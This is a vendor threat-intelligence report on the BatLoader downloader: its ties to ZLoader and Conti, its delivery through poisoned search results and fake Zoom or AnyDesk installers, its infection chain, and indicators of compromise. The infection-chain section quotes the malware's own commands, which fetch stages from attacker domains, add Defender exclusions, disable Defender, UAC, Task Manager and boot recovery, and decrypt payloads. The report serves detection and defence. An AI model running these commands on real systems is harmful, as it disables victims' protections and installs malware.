Threat Intelligence

BATLOADER: The Evasive Downloader Malware

Contributors: Deborah Snyder and Nikki Benoit

Executive Summary

VMware Carbon Black Managed Detection and Response (MDR) analysts are constantly handling security incidents within our customer environments and tracking emerging and persistent malware campaigns. One such threat that has been particularly prevalent over the last couple of months is BatLoader.  Named by Mandiant [1], BatLoader is an initial access malware that heavily uses batch and PowerShell scripts to gain a foothold on a victim machine and deliver other malware. The threat actors utilize search engine optimization (SEO) poisoning to lure users to download the malware from compromised websites. The use of living-off-the-land binaries makes this campaign hard to detect and block especially early on in the attack chain.

In this article, we will explore this malware campaign, addressing the history of BatLoader, its attributes, how it is delivered, the infection chain, and Carbon Black’s detection of the malware.

Attributes and Attribution

There are several attributes that are unique to BatLoader’s attack methodology that Carbon Black’s MDR team has seen in infected customer environments. The following can be used as a fingerprint to identify the malicious files (based on the OLE file information provided by VT):

Author Signer Subject
Softland MK Investment Properties Novapdf 11 tools
Test Tax In Cloud sp. z o.o. SetupProject1
Cloud Kancelaria Adwokacka Adwokat Aleksandra Krzemińska Cloud

Table 1: OLE File information for identified Batloader samples 

Other fingerprints pulled from the code can also be used to identify BatLoader files:

1 Set-Location “$Env:USERPROFILE\AppData\Roaming”

Invoke-WebRequest hxxtps://updatea1[.]com/g5

2 Set-Location “$Env:USERPROFILE\AppData\Roaming”

Invoke-WebRequest hxxp://cloudupdatesss[.]com

 

While researching BatLoader, the team discovered several attributes within the attack chain that are similar to previous activity linked to Conti. Evidence collected includes an IP address (134[.]0[.]117[.]195 – firsone1[.]online) that was previously used by Conti in a ransomware campaign leveraging Log4J [2], as well as techniques that Conti has used in other attacks. One of the techniques identified was the use of the Atera agent which has similarities to Conti’s previous techniques for their ransomware operations. Mandiant had previously released research on BatLoader and commented that activity from BatLoader overlaps with techniques that were released with Conti’s leaks in August 2021 [1].

This is not to say that Conti is responsible for BatLoader. Unaffiliated actors may be replicating the techniques of the group, especially since the Conti Leaks of August 2021.  Interestingly, Carbon Black’s MDR and Threat Analysis Unit (TAU) team did not find BatLoader being sold on the dark web, suggesting this may be a campaign by a single actor/group and not being sold as a service.

BatLoader vs ZLoader

While researching the pre-existing information on BatLoader published on the public internet, there seemed to be some confusion as to whether BatLoader and Zloader, a banking trojan, are one and the same. For example, looking up this file on VirusTotal we see that different antivirus engines group it in the Zloader malware family. The same file has been referenced in community-contributed IOC collections for both Zloader and Batloader.

Figure 1: Malware family analysis for a ZLoader Sample from VT

Thought to be derived from the Zeus banking trojan from the early 2000s, the Zloader malware has been observed in hundreds of campaigns over the years, evolving over time and improving its effectiveness against its targeted victims [3].  In 2021, security researchers reported a change in Zloader’s delivery method as well as key changes in its attack chain. The malware operators moved away from phishing email campaigns (more information can be found in TAU-TIN ZLoader) and we’re now using malicious advertisements to lure users to download signed Windows installer (.msi) files. These file downloads are disguised as installers for legitimate software such as TeamViewer, Zoom, Discord, JavaPlugin etc. Once installed, Zloader uses batch scripts to progress in the attack chain using the following tactics:

  • elevating privileges
  • evading defenses by disabling Defender using Nsudo
  • establishing persistence
  • downloading additional payloads using the PowerShell cmdlet Invoke-WebRequest.

Finally, the threat actor leverages CVE-2013-3900 and CVE-2020-1599 to execute a malicious script appended to a signed Windows dll that injects the main Zloader dll into an msiexec.exe process. Msiexec.exe then maintains communication with the C2 server.  In April 2022, Microsoft’s Digital Crime Unit (DCU) took down over 60 domains that were controlled by the threat actor group behind ZLoader, disrupting their botnet [4].

In many ways, Batloader draws familiarity from the previously known ZLoader. Our team analyzed the initial steps of compromise utilizing the two malware samples presented in the chart below to provide an accurate comparison.

Malware File Name SHA-256 Hash
BatLoader zoom.msi 3ec3c66c0099682250fe06db400f42ec7be9a0f4641eaad8473ccd8b28a48042
ZLoader zoom.msi / Team-viewer.msi 2c0d8fc0740598fa97c5d1b21edb011c8026740b77029d29c20f3275438ebfbd

 

Where these two malware types draw substantial similarities is through their use of SEO poisoning, leveraging Windows Installer, and their use of the native OS binaries during the attack delivery process.

Figure 2: Powershell command from Zloader & Batloader samples

With these similarities, we cannot conclude that these malware variants are entirely separate from each other, and of further note, some of the collected samples of Batloader and ZLoader both had an identical creation date and time within the file’s OLE metadata.

Figure 3:  OLE comparison for Batloader and ZLoader Hash from VirusTotal

Despite the resemblance between Batloader and Zloader, there are some differences worth noting. On average, Batloader samples are larger at ~107 MB while ZLoader is only about ~705 KB.  This is consistent with the amount of activity that is seen with Batloader from the start.

While it could not be verified whether or not the two malware variants are linked to the same threat actors, based on the used malicious code and shifts in attack delivery methods, our team’s findings align with Walmart [5] and Mandiant [1] that BatLoader is indeed an extension beyond ZLoader.

Figure 4: Comparing ZLoader (most recent campaign) and BatLoader attack chain

BatLoader Delivery

Note: Batloader continues to evolve and we have seen different execution steps from different samples. Although the core functionality remains the same, the malware operators use different scripts (both in name and content) possibly to make detection more difficult. For simplicity, we only analyzed one of the three variations we encountered. The IOC section below lists scripts and tools used in all the different attack chains. 

The operators of BatLoader malware leverage SEO poisoning to lure potential victims into downloading malicious Microsoft Windows Installer (.msi) files.  The msi files can either be directly downloaded, often found in the /Downloads folder or are included in a .zip archive file.  The files masquerade as other common legitimate software installers – e.g. zoom.msi, Teamviewer.msi, anydesk.msi – but are actually a copy of the free PDF creator novaPDF. The novaPDF installer is edited using the tool Advanced Installer to add a PowerShellScriptInline custom action that executes a malicious PowerShell script.  More on how to create PowerShell custom actions with Advanced Installer can be found here.

Figure 5:  Zoom.msi custom action

The PowerShell inline script kicks off the infection when executed during software installation, downloading the first BatLoader script, update.bat using the cmdlet Invoke-WebRequest as shown in Figure 6.

Figure 6:  PowerShellScriptInline custom action data represents the PowerShell code

Figure 7: Extracted PowerShell code

Infection Chain

The infection chain relies on batch scripts and PowerShell scripts written to the \appdata\roaming directory to gain initial access. update.bat downloads requestadmin.bat and nircmd.exe, a command line utility that can be used to gain admin privileges with the “elevate” and “elevatecmd” switches.

Figure 8:  Contents of Update.bat

Nircmd.exe and the initial zoom.msi file are both signed with the same certificate. We have identified three file signatures related to BatLoader files at the time of writing this:

  • MK Investment Properties Inc.
  • Kancelaria Adwokacka Adwokat Aleksandra Krzemińska
  • Tax in Cloud sp. Z o.o

With elevated privileges, requestadmin.bat downloads and executes runanddelete.bat and scripttodo.ps1.  For defense evasion, requestadmin.bat also adds exclusions for Windows Defender as listed below:

  • Add-MpPreference -ExclusionProcess ‘C:\Users\<user>\AppData\Roaming
  • Add-MpPreference -ExclusionPath ‘C:\Users\<user>\AppData\Roaming\’
  • Add-MpPreference -ExclusionPath ‘C:\Users\<user>\
  • Add-MpPreference -ExclusionProcess ‘C:\Users\<user>
  • Add-MpPreference -ExclusionProcess ‘C:\Windows*
  • Add-MpPreference -ExclusionExtension “.ps1″”
  • Add-MpPreference -ExclusionPath ‘C:\Users\<user>‘\AppData\Local\Temp\*’
  • Add-MpPreference -ExclusionProcess ‘C:\Users\<user>\AppData\Local\Temp\*’

The PowerShell script scripttodo.ps1 runs some discovery commands as well as downloading and installing a copy of Gpg4win (an email and file encryption package) and Nsudo.exe, a tool used to launch programs with elevated privileges.

  • computersystem get domain
  • arp.exe -a

Gpg4win is then used to decrypt more payloads.

  • “C:\Program Files (x86)\GNU\GnuPG\gpg2.exe” –batch –yes –passphrase 105b -o C:\Users\<user>\AppData\Roaming\d2ef5.exe -d C:\Users\<user>\AppData\Roaming\d2ef5.exe.gpg
  • “C:\Program Files (x86)\GNU\GnuPG\gpg2.exe” –batch –yes –passphrase 105b -o C:\Users\<user>\AppData\Roaming\p9d2s.exe -d C:\Users\<user>\AppData\Roaming\p9d2s.exe.gpg
  • “C:\Program Files (x86)\GNU\GnuPG\gpg2.exe” –batch –yes –passphrase 105b -o C:\Users\<user>\AppData\Roaming\f827.dll -d C:\Users\<user>\AppData\Roaming\f827.dll.gpg
  • “C:\Program Files (x86)\GNU\GnuPG\gpg2.exe” –batch –yes –passphrase 105b -o C:\Users\<user>\AppData\Roaming\d655.dll -d C:\Users\<user>\AppData\Roaming\d655.dll.gpg

Figure 9: Contents of runanddelete.bat from VT

Nsudo is used to impair defenses by adding the registry values ConsentPromptBehaviorAdmin ,Notification_Suppress, DisableTaskMgr, DisableCMD and DisableRegistryTools. These configurations restrict user access on the infected device making remediation difficult.

Nsudo -U:T sc config WinDefend start= disabled

NSudo -U:T -ShowWindowMode:Hide reg add “HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System” /v “ConsentPromptBehaviorAdmin” /t REG_DWORD /d “0” /f

NSudo -U:T -ShowWindowMode:Hide reg add “HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration” /v “Notification_Suppress” /t REG_DWORD /d “1” /f

NSudo -U:T -ShowWindowMode:Hide reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System” /v “DisableTaskMgr” /t REG_DWORD /d “1” /f

NSudo -U:T -ShowWindowMode:Hide reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System” /v “DisableCMD” /t REG_DWORD /d “1” /f

NSudo -U:T -ShowWindowMode:Hide reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System” /v “DisableRegistryTools” /t REG_DWORD /d “1” /f

NSudo -U:T -ShowWindowMode:Hide reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer” /v “NoRun” /t REG_DWORD /d “1” /f

Nsudo -U:T -ShowWindowMode:Hide bcdedit /set {default} recoveryenabled No

Nsudo -U:T -ShowWindowMode:Hide bcdedit /set {default} bootstatuspolicy ignoreallfailures

 

Requestadmin.bat also uses powercfg.exe to modify power settings on the infected device by configuring the lock screen timeout.

powercfg.exe /SETACVALUEINDEX SCHEME_CURRENT SUB_VIDEO VIDEOCONLOCK 1800

powercfg -change -standby-timeout-dc 3000

powercfg -change -standby-timeout-ac 3000

 

Batloader has also been observed installing remote monitoring software such as Servably’s Syncro and Atera RMM. This ensures the malware operators maintain access to the infected systems.

The final payloads dropped after infection often include two executables (e.g. d2ef5.exe, p9d2s.exe) and a DLL file (e.g. f827.dll, d655.dll). Within each of the infections we observed, one of the executable files was a known bad attributed to the Ursnif/Gozi malware family, a banking trojan. The other appeared to be Arkei/Vidar infostealer. Once these executables are set to run, the main dll is also executed. In some incidents, we were able to confirm that the dll was a Cobalt Strike stager.

Figure 10: Final DLL payload executed

VMware Carbon Black MDR Response

New threats are constantly emerging. At VMware Carbon Black we work around the clock to ensure that our products keep our customers safe from those very threats and offer MDR, the last wall of defense, to fill the gap between the known, evolving and unknown threats.

Batloader is a great example of the benefit of our MDR product. As our team has detailed, this malware variant is much stealthier and embeds itself quite thoroughly within the impacted host device. The Carbon Black sensor is able to detect specific behaviors of the malware and generate alerts for further analysis. The alerts in themselves did not paint a holistic picture of the attack. This would be a challenge for any team that does not have the resources to conduct an in depth threat hunt such as those provided by MDR.

The Endpoint Standard product receives updates for known malicious hashes and blocks all types of Known or Suspect malware files from executing through behavioral analysis. While the initial payload may be able to circumvent detection, it is highly likely that when the malware runs it will trigger other alerts that are indicators of a more complex attack, such as the ones highlighted below.

Figure 11: Alert triggered by requestadmin.bat artifact from Batloader malware

Figure 12: Alert triggered by the d2ef5.exe artifact from Batloader malware

MDR Threat Analysts detected this change in tactics and initiated the investigation that has brought us to this point of highlighting the nuances and vital differences between Batloader and Zloader and how it could impact our customer environments. The discovered IOCs related to this malicious behavior is documented to ease the next steps for our customers with Threat Analysts always available for follow-up questions and support.

Conclusion

BatLoader’s stealth and persistence are what made this malware stand out from the rest during its latest campaign. The MDR team has been highly successful in detecting these attacks, utilizing the written detections within the Carbon Black sensor and carefully crafted queries that would confirm whether or not the malware is related to BatLoader. As this variant has a focus on persistence, if it was able to successfully infect the host, it would be vital to perform the necessary analysis to fully remove the malware or restore from a known good backup.

Observed as early as July of 2022, this malware has already become commonplace as a threat against Carbon Black MDR customers. The following diagram illustrates its prevalence across different sectors, with business and financial services being prime targets. Since it was first observed by the VMware Carbon Black team there have been at least three waves of infection to date with more to be expected.

Figure 13: Attack prevalence across industries as seen by Carbon Black

This proves once again that as the threat landscape continues to change, the security industry as a whole needs the tools, knowledge, and collaboration to be able to detect and block the latest discovered techniques.  Here at VMware Carbon Black, the MDR team and TAU heavily rely on communication and collaboration to ensure that our products are able to stand against these threats as they continue to evolve in a timely manner. Our teams measure our success through our ability to adapt and persevere on this ever-changing battlefield.

Indicators of Compromise (IOCs)

Indicator Type Context
3ec3c66c0099682250fe06db400f42ec7be9a0f4641eaad8473ccd8b28a48042 SHA-256 zoom.msi
15c39d2084e399b4a0126c0b1026bd2342f8dc5d812cf0d0caae8e35ee689407 SHA-256 anydesk.msi
d0d53132fc9db8c4829769e222d70f25db9740239ac898ee30fad4a89a1197e5 SHA-256 ndp48-x86-x64.msi
661989f7dedd6a9bd37a69a3c80d6b308b1c704262e8bfc49ea5df45dbd0fce0 SHA-256 putty12.1.msi
9f017523e594c20c536e14b8c3a9bf5932c8a8853b5bdda4e16e9fbd251c72b5 SHA-256 ndp48-x86-x64.msi
bbbd869ada2a931528437ddfb1626f9705867036131f20db7a9b09318e593638 SHA-256 setup_iid_1c7a5958-03ff-4772-915d-8281b496fe116_14.msi
eed32513227a87faa2439b2217df1c965f9d5cbbf2e3a2b5bac1322c634038da SHA-256 zoominstaller70.0.msi
0c2c349c4f1c420d9810a7a6870d19558542ae9b7233cd4e5ce2142bf381d6b4 SHA-256 audacity-win12.6.msi
1d28ab9852d42bdf12599fd612691a8a68d73b03d80ddcd7aebf49dad2ea05b5 SHA-256 installerv9.0.msi
3ef74a6f1e2372daffc3ef4c98e0b9bb08e22a684c2d1bb8007eb2ba372654a2 SHA-256 zoominstaller65.0.msi
2a33d171c7b46d2905e1a2a2ac8e2e29a70b811e6ab9cc0c06c06897761e07a0 SHA-256 installerv8.4.msi
2ade09e144760d229a01b8f0c53ce60586f11c449e6fbfccd2fcf72e2cc6a484 SHA-256 zoominstaller68.0.msi
5fac5e0e79369db0b39346160644d5c29f88ed615e03c947116240f5fc5b05a1 SHA-256 installerv20.6.msi
acdbd6901ecb04106e7427af8602ac8473042b86f15a36bbdbd6bf04010b0602 SHA-256 zoominstaller60.7.msi
7ba7e1084c6fd760db2ef90fd00177fa72fad00286c39f8f13b52f34adbf9a2c SHA-256 zoominstaller60.5.msi
ded683fa45879dc8c1b702122dd46d6eeb234972367a0015b0207d7540a9c1fc SHA-256 installerv8.4.msi
e7c5fc948cfe3ff394d1ff9712995a77add82a5c507ce98debc722c06e3f1334 SHA-256 installerv9.0.msi
366151721ca41fe0227d34bbd3eda544774df24fb7d00c62dcd119519f8b9782 SHA-256 installerv20.9.msi
1faf88c503380c21f4817d8f2d41d62954be114233750223824b2757aa8d2d81 SHA-256 installerv40.1 (117).msi
4a27ced8592150fc2c74f3826cca90988633eb8f8723655152df521f88a039df SHA-256 installer36.5 (38).msi
89e1a688f88b38f256c9c17d0bcf5ecd12428a845e136d10a9a13579018e076f SHA-256 installer36.5 (37).msi
e59c2defd5a04095a36b8ffd8893f694bcf8583bf967958a4a41d7161871d399 SHA-256 installer36.5 (4).msi
dc6b6e1812f41c80ee67a72ebcb7a999488c866d805354936fb7506667005b43 SHA-256 pssabfa.ps1
5107ee907be6011f76a1e984a12ae2f56ccf6329cba7243ef9f2b50198839193 SHA-256 update.bat
2a9df5806d4af0072cb6f76c7d8ebcde7fca51a0ee13f609f5a492c78d449080 SHA-256 update.bat
1dc84699521090843fc320deccf157537de7eae6d52db4f78acde01bc106a90c SHA-256 update.bat
1fd5bbe5af7a7dcc52d5ea12e4d32c4818b2ef482de18f6c1b7cfda0986b1ee2 SHA-256 update.bat
447ec30c17c97fa67a21477e48aa66d6228ec46f604d8679fd4021d134cca7f8 SHA-256 update.bat
39b771a51c479187d089b9e42d67b6cee24607e197ba75549e9dad58163bc595 SHA-256 avolkov.exe
af64e4bccc5652b8f780e39e7e27d2d1f27b0395e0c646d4953b354b70eb54bf SHA-256 newtest.bat
9b6c2ed7ace21dc83cbd46b08acd3f73460c70735568e9fbd7bd7c8868cd8d27 SHA-256 user.ps1
591aa2607abc384c66d1532c1b6d4cc3d4052108245b03e3b6fea19a207c13d5 SHA-256 user.ps1
528e2be7188d1b337d0691b5c21618425afdb594139205accd2137313bbf1cfe SHA-256 mun.ps1
0911be79c918c04b7409f8cb5964f5dfed327f1f23fd326011a217987bdcb5f8 SHA-256 ru.ps1
04be8439fabc28959d7c109521e9eb4854f2a24402aacc4c3fb981e286fb5fa2 SHA-256 checkav.ps1
c737c388bab2b626e6a71eb8c2d8c68f2aca78e183233ea9a7c8e3fb1240ce94 SHA-256 checkav.ps1
e9282d53092385c81dec89bb99e9394e77c1ecce6ca20340b360bd46b146bf9f SHA-256 checkav.ps1
216047c048bf1dcbf031cf24bd5e0f263994a5df60b23089e393033d17257cb5 SHA-256 nircmd.exe
a6d46ae0d796fd3f90364058d67947f9caa2b7c75aa3b1695bbe10406ea1356c SHA-256 nircmd.exe
ae43e9e943e21ce2f7bd1db0c17f1ba8fd9b4d0fbd2a26f947627f19b0268da2 SHA-256 requestadmin.bat
96a82b93dd26cc7126c07403c8a1689b9407dd37459c7935cab8ea6c528a219a SHA-256 requestadmin.bat
a390f289566d2cf19f9afcad9b51497925e910e38068c2059896f15bbe3bcee7 SHA-256 requestadmin.bat
161302d0fa5608fe7f2cb81d84af309fa2e3aed09b46c548116f0155af396f80 SHA-256 requestadmin.bat
342b398647073159dfa8a7d36510171f731b760089a546e96fbb8a292791efee SHA-256 runanddelete.bat
5cd720b63b8383ed6cc3f3f97954bd029120cdf34b23bf222cd8af3f048b112b SHA-256 scripttodo.ps1
3c05ba5d8579c7684d799898e97861691a7828bed48a1e6261b2e1cd550fe275 SHA-256 scripttodo.ps1
4cd00234b18e04dcd745cc81bb928c8451f6601affb5fa45f20bb11bfb5383ce SHA-256 scripttodo.ps1
dd3e298fa01b7a035ed28b5649b4a7656be11c5a4c5dbb57b4919f4e9d837cb8 SHA-256 scripttodo.ps1
7d621bfbe4b32647abcd8216cd65be56aaf68d674bedc1094519562a8604a0e0 SHA-256 scripttodo.ps1
8e068fdc1deb02dc8056215fe3c400185845742d0227af7923483f891d62516c SHA-256 scripttodo.ps1
d62f9aa79ce6a406a6e5f13cd47fd1127c1f743010871724870e124ce57898f3 SHA-256 scripttodo.ps1
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618 SHA-256 nsudo.exe
43894c287c3ebccd30cd761dd4826518073773180ae0ab28355d604b44071441 SHA-256 gpg4win-2.2.5.exe
208d26c07914e54a5f1575d3720effb6b04cded65942a500d000bef2ce4e5843 SHA-256 gpg2.exe
a5af9aac1a7675fd3e3da75508d67d33827ae43b1f42dbdefc0d9a62915fa775 SHA-256 shutdowni.bat
bc98d852e5e1662ae8ca1f95b1d1d49f61c6b64024af04b1e4665d0247ec1de5 SHA-256 f827.msi (AteraAgent)
3503b5ca3d8070342d1f3c49efa44fd14d7f773f51d3bd5b1ded1aa19f9ed3e7 SHA-256 AteraAgent
5654f32a4f0f2e900a35761e8caf7ef0c50ee7800e0a3b19354b571bc6876f61 SHA-256 f827.exe

(Syncro RMM)

9f3afef4b3a589c4685f39d887725a664ec0fe78091069550402365e589f9d22 SHA-256 d2ef5.exe
1056ea3dad265dd554362bc0bd67f08fa2b9f3e5839e6e4fb197831a15c8acef SHA-256 d2ef5.exe
28a57a6a28080eb1374d88cca07b38fb645c558ad30d4d51929d8567dedf5021 SHA-256 d2ef5.exe
c1c4adf68455620082889b4c8576110441f6f2c7876240bc3f41f5cea8050370 SHA-256 d2ef5.exe
1be4782dc3839c4ab537b7d5ce80601334de1d84f4be455db7c80b4ae3ec51ce SHA-256 p9d2s.exe
72504c07e6105b70500519f3bcf718d3113624560c5594e87c08a4efc2e2a1a8 SHA-256 p9d2s.exe
22d5bac1b0cad7ee531f4a156dda677d1cb52ec6512154d42e7bdcef5cc9cc48 SHA-256 p9d2s.exe
b8f294bb3793eee72ab2d2bc436b18fe1c111704405688b43b686f83f0f0b8d0 SHA-256 p9d2s.exe
9cead0a2b8d586a8e2edde7aefe1e106a9894a95f9b251746442c7fbfe99df61 SHA-256 p9d2s.exe
1fe47cac924700a847e669f1d968d73d08fcd39fc3fa03f63035d78769374a40 SHA-256 d655.dll
1b277b89ee84148bd5beebcbdb69b9e5f82f3ce4d1dec4b459217323aec7fd60 SHA-256 d655.dll
54e844b5ae4a056ca8df4ca7299249c4910374d64261c83ac55e5fdf1b59f01d SHA-256 f827.dll
1daef45653406893cf3f53e0b80f4aa9c83d6a0e8288bd4c5f7e0318096621a0 SHA-256 installv2.dll
89.108.65[.]136 IP Address updatea1[.]com
146.112.61[.]107 IP Address updatea1[.]com
194.67.110[.]215 IP Address externalchecksso.com
194.67.119[.]190 IP Address cloudupdatesss[.]com
194.135.24[.]245 IP Address teenieshopus[.]com
139.60.161[.]74 IP Address liversofter.com

 

Reference List

[1]    N. C. Kiat, A. Del Rosario, M. Co. “Zoom For You — SEO Poisoning to Distribute BATLOADER and Atera Agent.” Mandiant. https://www.mandiant.com/resources/blog/seo

-poisoning-batloader-atera (accessed October, 2022).

[2]    L. Ilascu. “Conti ransomware uses Log4j bug to hack VMware vCenter servers.” Bleeping Computer. https://www.bleepingcomputer.com/news/security/conti-ransomware-

uses-log4j-

bug-to-hack-vmware-vcenter-servers/

[3]    D. Schwarz, M. Mesa, Proofpoint Research Team. “ZLoader Loads Again: New ZLoader Variant Returns.” Proofpoint. https://www.proofpoint.com/us/blog/threat-insight/zloader-loads-

again-new-zloader-variant-returns (accessed October, 2022).

[4]    A. Hogan-Burney. “Notorious cybercrime gang’s botnet disrupted.” Microsoft. https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware

-ukraine/ (accessed October, 2022).

[5]    J. Reaves, J.Platt. “Revisiting BatLoader C2 structure.” Walmart Global Tech Blog. https://medium.com/walmartglobaltech/revisiting-batloader-c2-structure-52f46ff9893a (accessed October, 2022)